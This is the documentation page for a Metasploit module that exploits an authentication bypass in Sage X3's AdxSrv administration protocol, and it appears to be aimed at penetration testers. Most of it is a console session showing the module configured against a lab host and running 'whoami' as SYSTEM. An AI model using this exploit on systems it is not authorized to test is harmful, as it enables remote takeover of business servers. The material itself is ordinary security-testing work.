## Vulnerable Application

### Description

This module exploits an authentication bypass in the administration protocol of Sage X3's
`AdxSrv` to execute arbitrary commands as `SYSTEM` on a Sage X3 server with an
available `AdxAdmin` service.

### Setup

Not available.

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Scenarios

### Sage X3 on Windows Server 2016

```
msf6 > use exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec
[*] Using configured payload cmd/windows/generic
msf6 exploit(windows/sage/x3_adxsrv_auth_bypass_cmd_exec) > options

Module options (exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   1818             yes       The target port (TCP)


Payload options (cmd/windows/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   whoami           yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf6 exploit(windows/sage/x3_adxsrv_auth_bypass_cmd_exec) > set rhosts 172.16.57.6
rhosts => 172.16.57.6
msf6 exploit(windows/sage/x3_adxsrv_auth_bypass_cmd_exec) > set rport 50000
rport => 50000
msf6 exploit(windows/sage/x3_adxsrv_auth_bypass_cmd_exec) > run

[*] 172.16.57.6:50000 - Connected
[+] 172.16.57.6:50000 - ADXDIR authentication successful.
[+] 172.16.57.6:50000 - Received directory info from host: D:\Sage\SafeX3\AdxAdmin
[+] 172.16.57.6:50000 - Command authentication successful.
[*] 172.16.57.6:50000 - Writing data
[+] 172.16.57.6:50000 - ------------ Response Received ------------
[*] 172.16.57.6:50000 - nt authority\system
[!] 172.16.57.6:50000 - This exploit may require manual cleanup of 'D:\Sage\SafeX3\AdxAdmin\tmp' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/sage/x3_adxsrv_auth_bypass_cmd_exec) >
```
